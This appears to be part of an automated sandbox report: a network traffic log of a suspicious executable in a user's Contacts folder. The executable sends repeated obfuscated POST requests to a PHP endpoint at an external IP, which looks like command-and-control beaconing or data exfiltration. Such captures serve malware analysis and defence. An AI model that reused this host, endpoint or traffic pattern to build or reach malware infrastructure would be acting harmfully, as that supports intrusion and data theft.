Nov 21, 2023 04:48:23.822760105 CET	508	OUT	Data Raw: 57 58 58 50 5b 53 5a 50 5d 57 55 57 55 5b 57 57 50 5d 58 40 56 50 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXXP[SZP]WUWU[WWP]X@VPWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(1(1* 8;'9":*+ "W'=2W$#-9++<_;&G''^)3
Nov 21, 2023 04:48:24.026417971 CET	509	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	77.91.124.101	80	192.168.2.5	49802	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:24.347886086 CET	509	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:24.546761036 CET	509	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:24.546966076 CET	512	OUT	Data Raw: 52 5a 58 5a 5e 5f 5a 50 5d 57 55 57 55 56 57 57 50 5b 58 46 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXZ^_ZP]WUWUVWWP[XFVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*+5?+2T>0$,% )X) "'="V$01:;<,'Y/.&G''^)
Nov 21, 2023 04:48:24.749294043 CET	512	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.5	49802	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:24.347886086 CET	509	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:24.546761036 CET	509	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:24.546966076 CET	512	OUT	Data Raw: 52 5a 58 5a 5e 5f 5a 50 5d 57 55 57 55 56 57 57 50 5b 58 46 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZXZ^_ZP]WUWUVWWP[XFVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*+5?+2T>0$,% )X) "'="V$01:;<,'Y/.&G''^)
Nov 21, 2023 04:48:24.749294043 CET	512	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	77.91.124.101	80	192.168.2.5	49803	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:25.067761898 CET	513	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:25.277538061 CET	513	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:25.277765989 CET	516	OUT	Data Raw: 52 5d 58 5f 5e 58 5a 58 5d 57 55 57 55 5c 57 54 50 5d 58 41 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]X_^XZX]WUWU\WTP]XAVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_+;1<;U/)4\)33-S3>S9>?(->&G''^)/
Nov 21, 2023 04:48:25.479048967 CET	516	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.5	49803	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:25.067761898 CET	513	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:25.277538061 CET	513	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:25.277765989 CET	516	OUT	Data Raw: 52 5d 58 5f 5e 58 5a 58 5d 57 55 57 55 5c 57 54 50 5d 58 41 56 57 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]X_^XZX]WUWU\WTP]XAVWW^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_+;1<;U/)4\)33-S3>S9>?(->&G''^)/
Nov 21, 2023 04:48:25.479048967 CET	516	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	77.91.124.101	80	192.168.2.5	49804	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:25.800508976 CET	517	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:25.999167919 CET	517	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:25.999428034 CET	520	OUT	Data Raw: 52 5c 5d 5b 5b 52 5a 5c 5d 57 55 57 55 56 57 53 50 5d 58 40 56 5e 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\][[RZ\]WUWUVWSP]X@V^WZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X+(%<"R,5"9\(3.V$[&R30.+:?<^,.&G''^)
Nov 21, 2023 04:48:26.209800005 CET	520	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.5	49804	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:25.800508976 CET	517	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:25.999167919 CET	517	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:25.999428034 CET	520	OUT	Data Raw: 52 5c 5d 5b 5b 52 5a 5c 5d 57 55 57 55 56 57 53 50 5d 58 40 56 5e 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R\][[RZ\]WUWUVWSP]X@V^WZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X+(%<"R,5"9\(3.V$[&R30.+:?<^,.&G''^)
Nov 21, 2023 04:48:26.209800005 CET	520	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49721	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:32.397201061 CET	178	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:32.596981049 CET	179	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:32.597275019 CET	181	OUT	Data Raw: 52 58 58 50 5b 53 5a 5f 5d 57 55 57 55 58 57 52 50 59 58 47 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXXP[SZ_]WUWUXWRPYXGVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'XX+1=U7Z.$#!]+V0=:Q0%-9?/4/.&G''^)?
Nov 21, 2023 04:47:32.802401066 CET	184	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 5c 26 2c 20 5a 21 23 33 10 29 29 36 0f 3a 00 2a 45 3c 0a 31 5b 25 2e 20 5a 27 29 22 0d 3f 11 02 10 27 29 24 54 34 25 38 11 3e 0a 21 5a 0c 1d 26 5a 21 2b 33 52 3f 00 0a 5a 3c 03 37 07 26 1f 02 07 3f 3e 2f 18 21 23 0d 59 31 23 15 09 38 11 31 5f 2e 28 36 40 27 3c 32 1d 22 3d 23 5f 0c 14 27 18 21 57 23 5e 34 09 21 0d 36 0e 3c 59 20 1a 3b 11 27 3d 0e 57 26 38 0f 17 3c 06 3b 0e 25 37 3f 08 27 2a 24 0b 31 39 2b 56 3f 00 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "\&, Z!#3))6:E<1[%. Z')"?')$T4%8>!Z&Z!+3R?Z<7&?>/!#Y1#81_.(6@'<2"=#_'!W#^4!6<Y ;'=W&8<;%7?'$19+V?&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	77.91.124.101	80	192.168.2.5	49721	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:32.397201061 CET	178	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 1408 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:32.596981049 CET	179	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:32.597275019 CET	181	OUT	Data Raw: 52 58 58 50 5b 53 5a 5f 5d 57 55 57 55 58 57 52 50 59 58 47 56 54 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RXXP[SZ_]WUWUXWRPYXGVTW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'XX+1=U7Z.$#!]+V0=:Q0%-9?/4/.&G''^)?
Nov 21, 2023 04:47:32.802401066 CET	184	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 01 10 22 5c 26 2c 20 5a 21 23 33 10 29 29 36 0f 3a 00 2a 45 3c 0a 31 5b 25 2e 20 5a 27 29 22 0d 3f 11 02 10 27 29 24 54 34 25 38 11 3e 0a 21 5a 0c 1d 26 5a 21 2b 33 52 3f 00 0a 5a 3c 03 37 07 26 1f 02 07 3f 3e 2f 18 21 23 0d 59 31 23 15 09 38 11 31 5f 2e 28 36 40 27 3c 32 1d 22 3d 23 5f 0c 14 27 18 21 57 23 5e 34 09 21 0d 36 0e 3c 59 20 1a 3b 11 27 3d 0e 57 26 38 0f 17 3c 06 3b 0e 25 37 3f 08 27 2a 24 0b 31 39 2b 56 3f 00 26 54 2a 0e 2b 48 02 36 5a 50 Data Ascii: "\&, Z!#3))6:E<1[%. Z')"?')$T4%8>!Z&Z!+3R?Z<7&?>/!#Y1#81_.(6@'<2"=#_'!W#^4!6<Y ;'=W&8<;%7?'$19+V?&T*+H6ZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	77.91.124.101	80	192.168.2.5	49805	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:26.539843082 CET	521	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:26.737345934 CET	521	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:26.738204956 CET	524	OUT	Data Raw: 52 5b 5d 5a 5b 5d 5a 58 5d 57 55 57 55 5e 57 55 50 52 58 44 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]Z[]ZX]WUWU^WUPRXDVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>8"+8"W> 8,&#:%+U:'"$>W9+5+,';&G''^)?
Nov 21, 2023 04:48:26.941642046 CET	524	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.5	49805	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:26.539843082 CET	521	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:26.737345934 CET	521	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:26.738204956 CET	524	OUT	Data Raw: 52 5b 5d 5a 5b 5d 5a 58 5d 57 55 57 55 5e 57 55 50 52 58 44 56 51 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R[]Z[]ZX]WUWU^WUPRXDVQWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>8"+8"W> 8,&#:%+U:'"$>W9+5+,';&G''^)?
Nov 21, 2023 04:48:26.941642046 CET	524	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	77.91.124.101	80	192.168.2.5	49806	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:27.268814087 CET	525	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:27.467691898 CET	525	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:27.467921019 CET	528	OUT	Data Raw: 52 5d 5d 5d 5e 58 5a 50 5d 57 55 57 55 5f 57 51 50 5d 58 47 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]]^XZP]WUWU_WQP]XGVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$8=?> <8'")5Y+%&>2Q001:]=?<7;&G''^)#
Nov 21, 2023 04:48:27.673158884 CET	528	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.5	49806	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:27.268814087 CET	525	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:27.467691898 CET	525	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:48:27.467921019 CET	528	OUT	Data Raw: 52 5d 5d 5d 5e 58 5a 50 5d 57 55 57 55 5f 57 51 50 5d 58 47 56 57 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]]]^XZP]WUWU_WQP]XGVWWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$8=?> <8'")5Y+%&>2Q001:]=?<7;&G''^)#
Nov 21, 2023 04:48:27.673158884 CET	528	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:48:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	77.91.124.101	80	192.168.2.5	49807	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:48:27.988404036 CET	529	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:28.185064077 CET	529	IN	HTTP/1.1 100 Continue
